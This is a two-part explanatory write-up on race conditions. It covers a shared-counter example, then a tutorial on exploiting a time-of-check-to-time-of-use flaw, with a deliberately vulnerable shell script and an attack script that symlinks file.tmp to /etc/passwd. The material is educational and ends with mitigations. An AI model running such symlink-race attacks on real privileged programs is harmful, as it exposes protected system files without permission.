A race condition is a situation where running multiple concurrent processes (for these purposes, a thread is also modeled as a process, as are processes running on separate machines) will give differing results, depending on the (unspecified, and usually unspecifiable) details of the ordering of operations.

To break this up into understandable bits: Suppose multiple processes are running, sharing some resource. Almost all models of concurrent execution don't specify a precise order in which the processes will execute instructions (and almost all real situations don't exhibit a precise order, either, so the models are accurate here). It is therefore reasonable to assume the end result of the computation will be dependent also on the order. Code which exhibits this is said to have a race condition.

Example

This is a specific example of one way in which a race condition can arise. But it is fairly illustrative. Consider this code:

for i:=1 to 10 do
  s := s+1
Suppose it runs in 2 processes, with the variable i private to each process, and the variable s shared (and initialised to 0 before execution starts). What is the "computed" value of s when both processes finish?

If the operation s := s+1 is executed atomically (that is, always executed in full by one process before the other can touch s), then the result is 20. But on almost all machines, this operation is executed as a load, an increment, and a store. And the other process may access s between operations. For instance, on the first iteration, the 2 processes may interleave instructions as follows:

LOAD s
                      LOAD s
INCREMENT s
STORE s
                      INCREMENT s
                      STORE s
After both processes have finished the first iteration, s will contain 1, instead of 2 as intended!

What's happening is that the processes are racing to see who will access s first, and who will finish the entire access first. In this example, there are no winners.

The solution (in this case) is to add a synchronization mechanism to all accesses to s, e.g. by placing them inside a mutual exclusion zone.

"Benevolent" race conditions

Not all race conditions are horrible! Consider, for example, a multithreaded web server trying to deal with an incoming connection. Which of the threads picks up the connection is, in general, not wholly determined by the state of the web server! Strictly speaking, this is a race condition.

But of course we don't care. In this case, we do not regard the identity of the thread which performs the service as part of the "result" of the "computation".

If, on the other hand, more than one thread would attempt to answer the connection, trouble would ensue. This is no longer a harmless race condition...

Race conditions are one of the ugliest type of bug to detect and fix, mainly because they are not reproducible. Even if all processes involved are started in the same order and with the same time difference, they will most likely arrive at the critical section differently than before, due to interrupts.

So if the race condition only manifests with a timing scenario that occurs with a very low probability, it becomes very hard to observe when you are actually looking for it. If you absolutely have to find it because the results are catastrophic and must not occur even infrequently, you're pretty screwed.

The way to deal with race conditions is to not let them come into being in the first place, by paying the utmost attention to correctly dealing with shared resources in the design stage, not in the debugging stage.

Caveat

Using this knowledge to exploit a computer system without permission could well be illegal. If you want to try it out, use your own system, or for more fun, get yourself to a Free Hacking Zone.

Introduction

Race conditions provide a helpful, if nondeterministic way for a hacker (of the hax0r variety) to exploit systems.

I will elaborate with a simple example; but note that in real life, it will never be this simple. The clued-in hacker must think around the problem, and apply the basic knowledge to the situation at hand.

Consider where the output is going... what input you could exploit... how to find a race condition.

The Theory

Imagine there is a priviledged process, which performs the following simple task:

Now, our programmer is aware of some possible exploits, and therefore ensures that if the file already exists on the system, then the program will be wary, and exit. We don't want anyone compromising our system, do we?

The hacker, however, posesses the most important trait of a good hacker... he is one step ahead.

We can utilise a race condition, which will wait until the main program has already performed its security checks; then substitute the file it's using. When the main program comes to output the file, we've really linked to a file we shouldn't be able to view. The program can access the file due to its higher security priviledge.

The program

#!/bin/sh

# Check that we haven't been compromised...
if [ -e file.tmp ]
then
 echo 'File exists: exiting'
 exit
fi

# Ok... we're fine, create and process the file.
echo 'Does not exist... creating'
echo I am too clever for your haxing exploit! > file.tmp

# Now we can display the file... it can't have changed, surely?
echo 'Listing...'
cat file.tmp
echo '(Done listing)'

# Remove the file.
echo 'Deleting...'
rm file.tmp

We've covered all the bases here. We won't run if the file already exists. We create a file, write into it, list it, remove it and exit. What could go wrong?

The Exploit

#!/bin/sh

# Run the unsuspecting program in the background.
/bin/bash -e prog &

# Go! Quick! Substitute the file!
rm -rf file.tmp
ln -s /etc/passwd file.tmp

# Wait for the dust to settle, then clear up.
sleep 1
rm -rf file.tmp

Here, we start the original program, then boldly remove the temporary file it has created, and link to the password file instead. If the timing happens to work correctly on a specific run, the output of the main program will be the password file!

Conclusion

Because this is a nondeterministic system, we may have to run it many, many times before the timing is perfect; hence we clear up after ourselves, so when the main program is run again, it suspects nothing.

It takes time and determination to exploit a system. But it's nearly always possible, whether through a race condition, or by other means.

In order to help avoid this particular problem, the programmer should ensure that the file operation is atomic, thereby locking out access of the temporary file to anyone else for the time it is required. Another common solution to similar exploits is to allow the program to have priviledged security for no longer than absolutely necessary.

Log in or registerto write something here or to contact authors.